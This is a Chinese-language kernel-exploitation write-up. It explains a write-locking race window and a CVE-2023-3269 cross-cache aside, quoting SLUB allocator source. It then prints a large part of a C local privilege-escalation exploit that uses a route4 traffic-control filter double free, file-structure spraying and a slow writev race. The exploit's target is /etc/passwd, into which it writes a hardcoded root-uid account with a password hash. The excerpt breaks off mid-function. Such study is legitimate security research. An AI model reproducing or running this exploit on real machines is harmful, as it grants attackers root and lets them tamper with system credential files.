其实这个file_start_write和file_end_write很容易猜出来其功能是什么，这里就是给write加上一个inode锁，当进程A在往程序中写入时进程B会被阻塞在file_start_write的位置，那也就意味着进程B已经通过了程序是否可写的验证了，只是等待进程A写完就会开始写入了，所以在此期间实现上面的偷梁换柱即可，而延长窗口时间的办法就是进程A写入大量数据使进程B阻塞时间延长。

篇外CVE-2023-3269

(与本文无瓜，这里主要举个cross-cache的🌰，仔细看了一下感觉这个考虑的问题比此篇文章考虑的要多一点)

这个漏洞就不展开讲述了，其是一个UAF漏洞，在cpu0访问vma时cpu1触发expand_stack时有一定几率会因为expand_stack释放掉对应的maple node，而另外一边则还在试图访问vma，当然是可以通过某种方式延长窗口时间，这里不过多提到。

所以如果我们想要实现任意地址读则需要用可控的结构体去占领比如msg_msg，可惜的是我们单纯堆喷msg_msg是无法在内存中申请到对应的位置的。

此漏洞的攻击方式从两个方向考虑的，第一就是开启了CONFIG_SLAB_MERGE_DEFAULT选项时(该选项默认开启)，意味着打开了slab重用机制，这里简单介绍一下slab重用机制。

在向pipe_buffer说yes！篇文章中详细描述了一个slab的申请过程但并没有讨论重用slab的选项，这里首先提一下重用的条件，在后续的代码中可以一一得到验证便于理解

对方的slab cache和自己的flag都不开启SLAB_NEVER_MERGE
对方的slab cache和自己都没有构造函数
对方的slab cache和自己的usersize都为0
对方的slab大小和自己的相同

struct kmem_cache *
kmem_cache_create_usercopy(const char *name,
		  unsigned int size, unsigned int align,
		  slab_flags_t flags,
		  unsigned int useroffset, unsigned int usersize,
		  void (*ctor)(void *))
{
	struct kmem_cache *s = NULL;
	const char *cache_name;
	int err;

#ifdef CONFIG_SLUB_DEBUG
	/*
	 * If no slub_debug was enabled globally, the static key is not yet
	 * enabled by setup_slub_debug(). Enable it if the cache is being
	 * created with any of the debugging flags passed explicitly.
	 */
	if (flags & SLAB_DEBUG_FLAGS)
		static_branch_enable(&slub_debug_enabled);
#endif

	mutex_lock(&slab_mutex);

	err = kmem_cache_sanity_check(name, size);
	if (err) {
		goto out_unlock;
	}

	/* Refuse requests with allocator specific flags */
	if (flags & ~SLAB_FLAGS_PERMITTED) {
		err = -EINVAL;
		goto out_unlock;
	}

	/*
	 * Some allocators will constraint the set of valid flags to a subset
	 * of all flags. We expect them to define CACHE_CREATE_MASK in this
	 * case, and we'll just provide them with a sanitized version of the
	 * passed flags.
	 */
	flags &= CACHE_CREATE_MASK;

	/* Fail closed on bad usersize of useroffset values. */
	if (WARN_ON(!usersize && useroffset) ||
	    WARN_ON(size < usersize || size - usersize < useroffset))
		usersize = useroffset = 0;

	if (!usersize)
		s = __kmem_cache_alias(name, size, align, flags, ctor);
	if (s)
		goto out_unlock;

	cache_name = kstrdup_const(name, GFP_KERNEL);
	if (!cache_name) {
		err = -ENOMEM;
		goto out_unlock;
	}

	s = create_cache(cache_name, size,
			 calculate_alignment(flags, align, size),
			 flags, useroffset, usersize, ctor, NULL);
	if (IS_ERR(s)) {
		err = PTR_ERR(s);
		kfree_const(cache_name);
	}

out_unlock:
	mutex_unlock(&slab_mutex);

	if (err) {
		if (flags & SLAB_PANIC)
			panic("%s: Failed to create slab '%s'. Error %d\n",
				__func__, name, err);
		else {
			pr_warn("%s(%s) failed with error %d\n",
				__func__, name, err);
			dump_stack();
		}
		return NULL;
	}
	return s;
}
EXPORT_SYMBOL(kmem_cache_create_usercopy);

在代码中会验证usersize是否为0，如果是则调用__kmem_cache_alias寻找可重用的slab如果找到了则直接退出

struct kmem_cache *
__kmem_cache_alias(const char *name, unsigned int size, unsigned int align,
		   slab_flags_t flags, void (*ctor)(void *))
{
	struct kmem_cache *s;

	s = find_mergeable(size, align, flags, name, ctor);
	if (s) {
		s->refcount++;

		/*
		 * Adjust the object sizes so that we clear
		 * the complete object on kzalloc.
		 */
		s->object_size = max(s->object_size, size);
		s->inuse = max(s->inuse, ALIGN(size, sizeof(void *)));

		if (sysfs_slab_alias(s, name)) {
			s->refcount--;
			s = NULL;
		}
	}

	return s;
}

继续跟进函数，可以发现其内部其实就是调用了一个find_mergeable去寻找slab

struct kmem_cache *find_mergeable(unsigned int size, unsigned int align,
		slab_flags_t flags, const char *name, void (*ctor)(void *))
{
	struct kmem_cache *s;

	if (slab_nomerge)
		return NULL;

	if (ctor)
		return NULL;

	size = ALIGN(size, sizeof(void *));
	align = calculate_alignment(flags, align, size);
	size = ALIGN(size, align);
	flags = kmem_cache_flags(size, flags, name);

	if (flags & SLAB_NEVER_MERGE)
		return NULL;

	list_for_each_entry_reverse(s, &slab_caches, list) {
		if (slab_unmergeable(s))
			continue;

		if (size > s->size)
			continue;

		if ((flags & SLAB_MERGE_SAME) != (s->flags & SLAB_MERGE_SAME))
			continue;
		/*
		 * Check if alignment is compatible.
		 * Courtesy of Adrian Drzewiecki
		 */
		if ((s->size & ~(align - 1)) != s->size)
			continue;

		if (s->size - size >= sizeof(void *))
			continue;

		if (IS_ENABLED(CONFIG_SLAB) && align &&
			(align > s->align || s->align % align))
			continue;

		return s;
	}
	return NULL;
}

而在函数内部则会校验前面提到的flags中不存在SLAB_NEVER_MERGE，随后遍历slab_caches全局链表使用slab_unmergeable函数查看是否可以重用

static bool slab_nomerge = !IS_ENABLED(CONFIG_SLAB_MERGE_DEFAULT);

int slab_unmergeable(struct kmem_cache *s)
{
	if (slab_nomerge || (s->flags & SLAB_NEVER_MERGE))
		return 1;

	if (s->ctor)
		return 1;

	if (s->usersize)
		return 1;

	/*
	 * We may have set a slab to be unmergeable during bootstrap.
	 */
	if (s->refcount < 0)
		return 1;

	return 0;
}

该函数会依次验证是否开启CONFIG_SLAB_MERGE_DEFAULT选项，flags标志位是否存在SLAB_NERVER_MERGE，是否存在构造函数，usersize是否为0，最后是引用次数小于0表示该slab准备释放无法重用。

以上就是slab重用的基本机制，从而可以得出，如果在开启了CONFIG_SLAB_MERGE_DEFAULT内核选项时存在UAF的maple node所在的slab是会进入到重用链表中取得，而后可以使用msg_msg结构体堆喷相同大小从而分配到UAF的maple node上去的。但是原文重点讲述了在没有开启CONFIG_SLAB_MERGE_DEFAULT选项时如何解决。

首先现在的很多计算机采用的时NUMA架构，意味着对于每个CPU来说是存在两条链表来存放被释放的slab，首先是cpu_slab和NODE的partial list，又因为不存在CONFIG_SLAB_MERGE_DEFAULT选项的关系，被释放的slab是无法被申请重用的所以这里需要将slab UAF转化为page UAF。

原文在这里使用的方式是通过clone/fork大量进程来申请大量相同的vma树，然后让一个slab中的所有内容都为我们的maple node，此时可以释放掉每个slab的多余的内容只留下一个object，最后触发漏洞，使其也被释放掉。因为一整个slab上的所有对象都被释放掉了，也就意味着此slab会被强制释放，随后会进入cpu_slab，如果我们前面申请的大量相同进程导致其满了则会进入node的partial list如果也满了则会进入销毁slab的流程

static void __slab_free(struct kmem_cache *s, struct page *page,
			void *head, void *tail, int cnt,
			unsigned long addr)

{
	void *prior;
	int was_frozen;
	struct page new;
	unsigned long counters;
	struct kmem_cache_node *n = NULL;
	unsigned long flags;

	// ... ...

	if (unlikely(!new.inuse && n->nr_partial >= s->min_partial))
		goto slab_empty;

	/*
	 * Objects left in the slab. If it was not on the partial list before
	 * then add it.
	 */
	if (!kmem_cache_has_cpu_partial(s) && unlikely(!prior)) {
		remove_full(s, n, page);
		add_partial(n, page, DEACTIVATE_TO_TAIL);
		stat(s, FREE_ADD_PARTIAL);
	}
	spin_unlock_irqrestore(&n->list_lock, flags);
	return;

slab_empty:
	if (prior) {
		/*
		 * Slab on the partial list.
		 */
		remove_partial(n, page);
		stat(s, FREE_REMOVE_PARTIAL);
	} else {
		/* Slab must be on the full list */
		remove_full(s, n, page);
	}

	spin_unlock_irqrestore(&n->list_lock, flags);
	stat(s, FREE_SLAB);
	discard_slab(s, page);
}

可以看到这里会验证数量是否满了，如果满了则会进入销毁流程调用discard_slab

static void discard_slab(struct kmem_cache *s, struct page *page)
{
	dec_slabs_node(s, page_to_nid(page), page->objects);
	free_slab(s, page);
}

而discard_slab函数首先做的事是修改一些数据上的内容随后接着调用free_slab

static void free_slab(struct kmem_cache *s, struct page *page)
{
	if (unlikely(s->flags & SLAB_TYPESAFE_BY_RCU)) {
		call_rcu(&page->rcu_head, rcu_free_slab);
	} else
		__free_slab(s, page);
}

static void __free_slab(struct kmem_cache *s, struct page *page)
{
	int order = compound_order(page);
	int pages = 1 << order;

	if (kmem_cache_debug_flags(s, SLAB_CONSISTENCY_CHECKS)) {
		void *p;

		slab_pad_check(s, page);
		for_each_object(p, s, page_address(page),
						page->objects)
			check_object(s, page, p, SLUB_RED_INACTIVE);
	}

	__ClearPageSlabPfmemalloc(page);
	__ClearPageSlab(page);
	/* In union with page->mapping where page allocator expects NULL */
	page->slab_cache = NULL;
	if (current->reclaim_state)
		current->reclaim_state->reclaimed_slab += pages;
	unaccount_slab_page(page, order, s);
	__free_pages(page, order);
}

这里做的事就是获得page的order去出page->slab_cache的指针，最后释放对应page。当释放page就好办了，可以大量堆喷msg_msg向buddy system申请page即可。

综上，可得exp

可以预见的是，这一利用方法是不需要依赖任何地址的，但是这里想要跑通exp需要修改一下config文件

CONFIG_NET_CLS_ROUTE4=y
CONFIG_DUMMY=y 
CONFIG_NET_SCH_QFQ=y 
CONFIG_NET_CLS_BASIC=y

(有点不想写exp了，如果没删这句话那下面exp就是原文的，如果删了就是自己写的~~好像删了你们也看不到~~)

#define _GNU_SOURCE

#include <arpa/inet.h>
#include <assert.h>
#include <dirent.h>
#include <endian.h>
#include <errno.h>
#include <fcntl.h>
#include <net/if.h>
#include <net/if_arp.h>
#include <netinet/in.h>
#include <sched.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/epoll.h>
#include <sys/ioctl.h>
#include <sys/ipc.h>
#include <sys/mount.h>
#include <sys/msg.h>
#include <sys/syscall.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

#include <sys/shm.h>
#include <sys/stat.h>
#include <sys/timerfd.h>

#include <linux/tc_ematch/tc_em_meta.h>
#include <sys/resource.h>

#include <linux/capability.h>
#include <linux/futex.h>
#include <linux/genetlink.h>
#include <linux/if_addr.h>
#include <linux/if_ether.h>
#include <linux/if_link.h>
#include <linux/if_tun.h>
#include <linux/in6.h>
#include <linux/ip.h>
#include <linux/kcmp.h>
#include <linux/neighbour.h>
#include <linux/net.h>
#include <linux/netlink.h>
#include <linux/pkt_cls.h>
#include <linux/pkt_sched.h>
#include <linux/rtnetlink.h>
#include <linux/tcp.h>
#include <linux/veth.h>

#include <x86intrin.h>

#include <err.h>
#include <fcntl.h>
#include <poll.h>
#include <pthread.h>
#include <stdio.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/utsname.h>
#include <unistd.h>

// #define DEBUG

char *target = "/etc/passwd";
char *overwrite =
    "user:$1$user$k8sntSoh7jhsc6lwspjsU.:0:0:root:/root:/bin/bash\n";
char *global;
char *self_path;
char *content;

#define PAGE_SIZE 0x1000
#define MAX_FILE_NUM 0x8000

int fds[MAX_FILE_NUM] = {};
int fd_2[MAX_FILE_NUM] = {};
int overlap_a = -1;
int overlap_b = -1;

int cpu_cores = 0;
int sockfd = -1;

int spray_num_1 = 2000;
int spray_num_2 = 4000;

// int spray_num_1 = 4000;
// int spray_num_2 = 5000;

int pipe_main[2];
int pipe_parent[2];
int pipe_child[2];
int pipe_defrag[2];
int pipe_file_spray[2][2];

int run_write = 0;
int run_spray = 0;
char *passwd;
bool overlapped = false;

void DumpHex(const void *data, size_t size)
{
#ifdef DEBUG
    char ascii[17];
    size_t i, j;
    ascii[16] = '\0';
    for (i = 0; i < size; ++i)
    {
        printf("%02X ", ((unsigned char *)data)[i]);
        if (((unsigned char *)data)[i] >= ' ' &&
            ((unsigned char *)data)[i] <= '~')
        {
            ascii[i % 16] = ((unsigned char *)data)[i];
        }
        else
        {
            ascii[i % 16] = '.';
        }
        if ((i + 1) % 8 == 0 || i + 1 == size)
        {
            printf(" ");
            if ((i + 1) % 16 == 0)
            {
                printf("|  %s \n", ascii);
            }
            else if (i + 1 == size)
            {
                ascii[(i + 1) % 16] = '\0';
                if ((i + 1) % 16 <= 8)
                {
                    printf(" ");
                }
                for (j = (i + 1) % 16; j < 16; ++j)
                {
                    printf("   ");
                }
                printf("|  %s \n", ascii);
            }
        }
    }
#endif
}

void pin_on_cpu(int cpu)
{
    cpu_set_t cpu_set;
    CPU_ZERO(&cpu_set);
    CPU_SET(cpu, &cpu_set);
    if (sched_setaffinity(0, sizeof(cpu_set), &cpu_set) != 0)
    {
        perror("sched_setaffinity()");
        exit(EXIT_FAILURE);
    }
}

static bool write_file(const char *file, const char *what, ...)
{
    char buf[1024];
    va_list args;
    va_start(args, what);
    vsnprintf(buf, sizeof(buf), what, args);
    va_end(args);
    buf[sizeof(buf) - 1] = 0;
    int len = strlen(buf);
    int fd = open(file, O_WRONLY | O_CLOEXEC);
    if (fd == -1)
        return false;
    if (write(fd, buf, len) != len)
    {
        int err = errno;
        close(fd);
        errno = err;
        return false;
    }
    close(fd);
    return true;
}

static void use_temporary_dir(void)
{
    system("rm -rf exp_dir; mkdir exp_dir; touch exp_dir/data");
    system("touch exp_dir/data2");
    char *tmpdir = "exp_dir";
    if (!tmpdir)
        exit(1);
    if (chmod(tmpdir, 0777))
        exit(1);
    if (chdir(tmpdir))
        exit(1);
    symlink("./data", "./uaf");
}

static void setup_common()
{
    if (mount(0, "/sys/fs/fuse/connections", "fusectl", 0, 0))
    {
    }
}

static void adjust_rlimit()
{
    struct rlimit rlim;
    rlim.rlim_cur = rlim.rlim_max = (200 << 20);
    setrlimit(RLIMIT_AS, &rlim);
    rlim.rlim_cur = rlim.rlim_max = 32 << 20;
    setrlimit(RLIMIT_MEMLOCK, &rlim);
    rlim.rlim_cur = rlim.rlim_max = 136 << 20;
    // setrlimit(RLIMIT_FSIZE, &rlim);
    rlim.rlim_cur = rlim.rlim_max = 1 << 20;
    setrlimit(RLIMIT_STACK, &rlim);
    rlim.rlim_cur = rlim.rlim_max = 0;
    setrlimit(RLIMIT_CORE, &rlim);
    // RLIMIT_FILE
    rlim.rlim_cur = rlim.rlim_max = 14096;
    if (setrlimit(RLIMIT_NOFILE, &rlim) < 0)
    {
        rlim.rlim_cur = rlim.rlim_max = 4096;
        spray_num_1 = 1200;
        spray_num_2 = 2800;
        if (setrlimit(RLIMIT_NOFILE, &rlim) < 0)
        {
            perror("setrlimit");
            err(1, "setrlimit");
        }
    }
}

void setup_namespace()
{
    int real_uid = getuid();
    int real_gid = getgid();

    if (unshare(CLONE_NEWUSER) != 0)
    {
        perror("[-] unshare(CLONE_NEWUSER)");
        exit(EXIT_FAILURE);
    }

    if (unshare(CLONE_NEWNET) != 0)
    {
        perror("[-] unshare(CLONE_NEWUSER)");
        exit(EXIT_FAILURE);
    }

    if (!write_file("/proc/self/setgroups", "deny"))
    {
        perror("[-] write_file(/proc/self/set_groups)");
        exit(EXIT_FAILURE);
    }
    if (!write_file("/proc/self/uid_map", "0 %d 1\n", real_uid))
    {
        perror("[-] write_file(/proc/self/uid_map)");
        exit(EXIT_FAILURE);
    }
    if (!write_file("/proc/self/gid_map", "0 %d 1\n", real_gid))
    {
        perror("[-] write_file(/proc/self/gid_map)");
        exit(EXIT_FAILURE);
    }
}

#define NLMSG_TAIL(nmsg) \
    ((struct rtattr *)(((void *)(nmsg)) + NLMSG_ALIGN((nmsg)->nlmsg_len)))

int addattr(char *attr, int type, void *data, int len)
{
    struct rtattr *rta = (struct rtattr *)attr;

    rta->rta_type = type;
    rta->rta_len = RTA_LENGTH(len);
    if (len)
    {
        memcpy(RTA_DATA(attr), data, len);
    }

    return RTA_LENGTH(len);
}

int addattr_l(struct nlmsghdr *n, int maxlen, int type, const void *data,
              int alen)
{
    int len = RTA_LENGTH(alen);
    struct rtattr *rta;

    if (NLMSG_ALIGN(n->nlmsg_len) + RTA_ALIGN(len) > maxlen)
    {
        fprintf(stderr, "addattr_l ERROR: message exceeded bound of %d\n", maxlen);
        return -1;
    }
    rta = NLMSG_TAIL(n);
    rta->rta_type = type;
    rta->rta_len = len;
    if (alen)
        memcpy(RTA_DATA(rta), data, alen);
    n->nlmsg_len = NLMSG_ALIGN(n->nlmsg_len) + RTA_ALIGN(len);
    return 0;
}

struct rtattr *addattr_nest(struct nlmsghdr *n, int maxlen, int type)
{
    struct rtattr *nest = NLMSG_TAIL(n);

    addattr_l(n, maxlen, type, NULL, 0);
    return nest;
}

int addattr_nest_end(struct nlmsghdr *n, struct rtattr *nest)
{
    nest->rta_len = (void *)NLMSG_TAIL(n) - (void *)nest;
    return n->nlmsg_len;
}

int add_qdisc(int fd)
{
    char *start = malloc(0x1000);
    memset(start, 0, 0x1000);
    struct nlmsghdr *msg = (struct nlmsghdr *)start;

    // new qdisc
    msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg));
    msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_EXCL | NLM_F_CREATE;
    msg->nlmsg_type = RTM_NEWQDISC;
    struct tcmsg *t = (struct tcmsg *)(start + sizeof(struct nlmsghdr));
    // set local
    t->tcm_ifindex = 1;
    t->tcm_family = AF_UNSPEC;
    t->tcm_parent = TC_H_ROOT;
    // prio, protocol
    u_int32_t prio = 1;
    u_int32_t protocol = 1;
    t->tcm_info = TC_H_MAKE(prio << 16, protocol);

    addattr_l(msg, 0x1000, TCA_KIND, "sfq", 4);

    // packing
#ifdef DEBUG
    DumpHex(msg, msg->nlmsg_len);
#endif

    struct iovec iov = {.iov_base = msg, .iov_len = msg->nlmsg_len};
    struct sockaddr_nl nladdr = {.nl_family = AF_NETLINK};
    struct msghdr msgh = {
        .msg_name = &nladdr,
        .msg_namelen = sizeof(nladdr),
        .msg_iov = &iov,
        .msg_iovlen = 1,
    };
    return sendmsg(fd, &msgh, 0);
}

int add_tc_(int fd, u_int32_t from, u_int32_t to, u_int32_t handle,
            u_int16_t flags)
{
    char *start = malloc(0x2000);
    memset(start, 0, 0x2000);
    struct nlmsghdr *msg = (struct nlmsghdr *)start;

    // new filter
    msg = msg + msg->nlmsg_len;
    msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg));
    msg->nlmsg_flags = NLM_F_REQUEST | flags;
    msg->nlmsg_type = RTM_NEWTFILTER;
    struct tcmsg *t = (struct tcmsg *)(start + sizeof(struct nlmsghdr));

    // prio, protocol
    u_int32_t prio = 1;
    u_int32_t protocol = 1;
    t->tcm_info = TC_H_MAKE(prio << 16, protocol);
    t->tcm_ifindex = 1;
    t->tcm_family = AF_UNSPEC;
    t->tcm_handle = handle;

    addattr_l(msg, 0x1000, TCA_KIND, "route", 6);
    struct rtattr *tail = addattr_nest(msg, 0x1000, TCA_OPTIONS);
    addattr_l(msg, 0x1000, TCA_ROUTE4_FROM, &from, 4);
    addattr_l(msg, 0x1000, TCA_ROUTE4_TO, &to, 4);
    addattr_nest_end(msg, tail);

    // packing
    struct iovec iov = {.iov_base = msg, .iov_len = msg->nlmsg_len};
    struct sockaddr_nl nladdr = {.nl_family = AF_NETLINK};
    struct msghdr msgh = {
        .msg_name = &nladdr,
        .msg_namelen = sizeof(nladdr),
        .msg_iov = &iov,
        .msg_iovlen = 1,
    };

    sendmsg(fd, &msgh, 0);

    free(start);
    return 1;
}

void add_tc(int sockfd, uint32_t handle, uint16_t flag)
{
    add_tc_(sockfd, 0, handle, (handle << 8) + handle, flag);
}

uint32_t calc_handle(uint32_t from, uint32_t to)
{
    uint32_t handle = to;

    assert(from <= 0xff && to <= 0xff);
    handle |= from << 16;

    if (((handle & 0x7f00) | handle) != handle)
        return 0;

    if (handle == 0 || (handle & 0x8000))
        return 0;
    return handle;
}

void *delete_tc_(int sockfd, u_int32_t handle)
{
    char *start = malloc(0x4000);
    memset(start, 0, 0x4000);
    struct nlmsghdr *msg = (struct nlmsghdr *)start;

    // new filter
    msg = msg + msg->nlmsg_len;
    msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg));
    msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_ECHO;
    msg->nlmsg_type = RTM_DELTFILTER;
    struct tcmsg *t = (struct tcmsg *)(start + sizeof(struct nlmsghdr));

    // prio, protocol
    u_int32_t prio = 1;
    u_int32_t protocol = 1;
    t->tcm_info = TC_H_MAKE(prio << 16, protocol);
    t->tcm_ifindex = 1;
    t->tcm_family = AF_UNSPEC;
    t->tcm_handle = handle;

    addattr_l(msg, 0x1000, TCA_KIND, "route", 6);
    struct rtattr *tail = addattr_nest(msg, 0x1000, TCA_OPTIONS);
    addattr_nest_end(msg, tail);

    // packing
    struct iovec iov = {.iov_base = msg, .iov_len = msg->nlmsg_len};
    struct sockaddr_nl nladdr = {.nl_family = AF_NETLINK};
    struct msghdr msgh = {
        .msg_name = &nladdr,
        .msg_namelen = sizeof(nladdr),
        .msg_iov = &iov,
        .msg_iovlen = 1,
    };

    sendmsg(sockfd, &msgh, 0);
    memset(start, 0, 0x4000);
    iov.iov_len = 0x4000;
    iov.iov_base = start;
    recvmsg(sockfd, &msgh, 0);

    if (msgh.msg_namelen != sizeof(nladdr))
    {
        printf("size of sender address is wrong\n");
    }
    return start;
}

void delete_tc(int sockfd, uint32_t handle)
{
    delete_tc_(sockfd, ((handle) << 8) + (handle));
}

// basic for spray
int add_tc_basic(int fd, uint32_t handle, void *spray_data, size_t spray_len,
                 int spray_count)
{
    assert(spray_len * spray_count < 0x3000);
    char *start = malloc(0x4000);
    memset(start, 0, 0x4000);
    struct nlmsghdr *msg = (struct nlmsghdr *)start;

    // new filter
    msg = msg + msg->nlmsg_len;
    msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg));
    msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE; // | flags;
    msg->nlmsg_type = RTM_NEWTFILTER;
    struct tcmsg *t = (struct tcmsg *)(start + sizeof(struct nlmsghdr));

    // prio, protocol
    u_int32_t prio = 1;
    u_int32_t protocol = 1;
    t->tcm_info = TC_H_MAKE(prio << 16, protocol);
    t->tcm_ifindex = 1;
    t->tcm_family = AF_UNSPEC;
    t->tcm_handle = handle;
    // t->tcm_parent = TC_H_ROOT;

    addattr_l(msg, 0x4000, TCA_KIND, "basic", 6);
    struct rtattr *tail = addattr_nest(msg, 0x4000, TCA_OPTIONS);
    struct rtattr *ema_tail = addattr_nest(msg, 0x4000, TCA_BASIC_EMATCHES);
    struct tcf_ematch_tree_hdr tree_hdr = {.nmatches = spray_count / 2,
                                           .progid = 0};

    addattr_l(msg, 0x4000, TCA_EMATCH_TREE_HDR, &tree_hdr, sizeof(tree_hdr));
    struct rtattr *rt_match_tail =
        addattr_nest(msg, 0x4000, TCA_EMATCH_TREE_LIST);

    char *data = malloc(0x3000);
    for (int i = 0; i < tree_hdr.nmatches; i++)
    {
        char *current;
        memset(data, 0, 0x3000);
        struct tcf_ematch_hdr *hdr = (struct tcf_ematch_hdr *)data;
        hdr->kind = TCF_EM_META;
        hdr->flags = TCF_EM_REL_AND;

        current = data + sizeof(*hdr);

        struct tcf_meta_hdr meta_hdr = {
            .left.kind = TCF_META_TYPE_VAR << 12 | TCF_META_ID_DEV,
            .right.kind = TCF_META_TYPE_VAR << 12 | TCF_META_ID_DEV,
        };

        current += addattr(current, TCA_EM_META_HDR, &meta_hdr, sizeof(hdr));
        current += addattr(current, TCA_EM_META_LVALUE, spray_data, spray_len);
        current += addattr(current, TCA_EM_META_RVALUE, spray_data, spray_len);

        addattr_l(msg, 0x4000, i + 1, data, current - data);
    }

    addattr_nest_end(msg, rt_match_tail);
    addattr_nest_end(msg, ema_tail);
    addattr_nest_end(msg, tail);

    // packing
    struct iovec iov = {.iov_base = msg, .iov_len = msg->nlmsg_len};
    struct sockaddr_nl nladdr = {.nl_family = AF_NETLINK};
    struct msghdr msgh = {
        .msg_name = &nladdr,
        .msg_namelen = sizeof(nladdr),
        .msg_iov = &iov,
        .msg_iovlen = 1,
    };
    sendmsg(fd, &msgh, 0);
    free(data);
    free(start);
    return 1;
}

void *delete_tc_basic(int sockfd, u_int32_t handle)
{
    char *start = malloc(0x4000);
    memset(start, 0, 0x4000);
    struct nlmsghdr *msg = (struct nlmsghdr *)start;

    // new filter
    msg = msg + msg->nlmsg_len;
    msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg));
    msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_ECHO;
    msg->nlmsg_type = RTM_DELTFILTER;
    struct tcmsg *t = (struct tcmsg *)(start + sizeof(struct nlmsghdr));

    // prio, protocol
    u_int32_t prio = 1;
    u_int32_t protocol = 1;
    t->tcm_info = TC_H_MAKE(prio << 16, protocol);
    t->tcm_ifindex = 1;
    t->tcm_family = AF_UNSPEC;
    t->tcm_handle = handle;
    // t->tcm_parent = TC_H_ROOT;

    addattr_l(msg, 0x1000, TCA_KIND, "basic", 6);
    struct rtattr *tail = addattr_nest(msg, 0x1000, TCA_OPTIONS);
    addattr_nest_end(msg, tail);

    // packing
    struct iovec iov = {.iov_base = msg, .iov_len = msg->nlmsg_len};
    struct sockaddr_nl nladdr = {.nl_family = AF_NETLINK};
    struct msghdr msgh = {
        .msg_name = &nladdr,
        .msg_namelen = sizeof(nladdr),
        .msg_iov = &iov,
        .msg_iovlen = 1,
    };

    sendmsg(sockfd, &msgh, 0);
    memset(start, 0, 0x4000);
    iov.iov_len = 0x4000;
    iov.iov_base = start;
    recvmsg(sockfd, &msgh, 0);

    if (msgh.msg_namelen != sizeof(nladdr))
    {
        printf("size of sender address is wrong\n");
    }

    return start;
}

void *slow_write()
{
    printf("start slow write\n");
    clock_t start, end;
    int fd = open("./uaf", 1);

    if (fd < 0)
    {
        perror("error open uaf file");
        exit(-1);
    }

    unsigned long int addr = 0x30000000;
    int offset;
    for (offset = 0; offset < 0x80000 / 20; offset++)
    {
        void *r = mmap((void *)(addr + offset * 0x1000), 0x1000,
                       PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, 0, 0);
        if (r < 0)
        {
            printf("allocate failed at 0x%x\n", offset);
        }
    }

    assert(offset > 0);

    void *mem = (void *)(addr);
    memcpy(mem, "hhhhh", 5);

    struct iovec iov[20];
    for (int i = 0; i < 20; i++)
    {
        iov[i].iov_base = mem;
        iov[i].iov_len = offset * 0x1000;
    }

    run_write = 1;
    start = clock();
    // 2GB max
    if (writev(fd, iov, 20) < 0)
    {
        perror("slow write");
    }
    end = clock();
    double spent = (double)(end - start) / CLOCKS_PER_SEC;
    printf("write done, spent %f s\n", spent);
    run_write = 0;
}

void *write_cmd()
{
    // user:$1$user$k8sntSoh7jhsc6lwspjsU.:0:0:/root/root:/bin/bash
    char data[1024] =
        "user:$1$user$k8sntSoh7jhsc6lwspjsU.:0:0:/root/root:/bin/bash";
    // struct iovec iov = {.iov_base = data, .iov_len = strlen(data)};
    struct iovec iov = {.iov_base = content, .iov_len = strlen(content)};

    while (!run_write)
    {
    }
    run_spray = 1;
    if (writev(overlap_a, &iov, 1) < 0)
    {
        printf("failed to write\n");
    }
    printf("should be after the slow write\n");
}

void pre_exploit()
{
    adjust_rlimit();
    use_temporary_dir();
    setup_namespace();
}

void exploit()
{
    char buf[2 * PAGE_SIZE] = {};
    char msg[0x10] = {};
    char *spray;
    int cc;
    struct rlimit old_lim, lim, new_lim;

    // Get old limits
    if (getrlimit(RLIMIT_NOFILE, &old_lim) == 0)
        printf("Old limits -> soft limit= %ld \t"
               " hard limit= %ld \n",
               old_lim.rlim_cur, old_lim.rlim_max);
    pin_on_cpu(0);
    printf("starting exploit, num of cores: %d\n", cpu_cores);

    sockfd = socket(PF_NETLINK, SOCK_RAW, 0);
    assert(sockfd != -1);
    add_qdisc(sockfd);

    // wait for parent
    if (read(pipe_child[0], msg, 2) != 2)
    {
        err(1, "read from parent");
    }
    // allocate the vulnerable object
    add_tc_(sockfd, 0, 0, 0, NLM_F_EXCL | NLM_F_CREATE);

    // ask parent to keep spraying
    if (write(pipe_parent[1], "OK", 2) != 2)
    {
        err(1, "write to child");
    }
    if (read(pipe_child[0], msg, 2) != 2)
    {
        err(1, "read from parent");
    }

    // free the object, to free the slab
    add_tc_(sockfd, 0x11, 0x12, 0, NLM_F_CREATE);

    // wait for the vulnerable object being freed
    usleep(500 * 1000);
    printf("freed the filter object\n");
    // sync
    if (write(pipe_parent[1], "OK", 2) != 2)
    {
        err(1, "write to child");
    }
    if (read(pipe_child[0], msg, 2) != 2)
    {
        err(1, "read from parent");
    }

    usleep(1000 * 1000);

    for (int i = 0; i < spray_num_1; i++)
    {
        pin_on_cpu(i % cpu_cores);
        fds[i] = open("./data2", 1);
        assert(fds[i] > 0);
    }

    // double free route4, which will free the file
    add_tc_(sockfd, 0x11, 0x13, 0, NLM_F_CREATE);
    usleep(1000 * 100);

    // should not sleep too long, otherwise file might be claimed by others
    printf("double free done\n");
    printf("spraying files\n");

    // the following is to figure out which file is freed
    for (int i = 0; i < spray_num_2; i++)
    {
        pin_on_cpu(i % cpu_cores);
        fd_2[i] = open("./uaf", 1);
        assert(fd_2[i] > 0);
        for (int j = 0; j < spray_num_1; j++)
        {
            if (syscall(__NR_kcmp, getpid(), getpid(), KCMP_FILE, fds[j], fd_2[i]) ==
                0)
            {
                printf("found overlap, id : %d, %d\n", i, j);
                overlap_a = fds[j];
                overlap_b = fd_2[i];

                pthread_t pid, pid2;
                pthread_create(&pid, NULL, slow_write, NULL);
                pthread_create(&pid2, NULL, write_cmd, NULL);

                while (!run_spray)
                {
                }

                close(overlap_a);
                close(overlap_b);
                printf("closed overlap\n");

                usleep(1000 * 100);

                int spray_num = 4096;
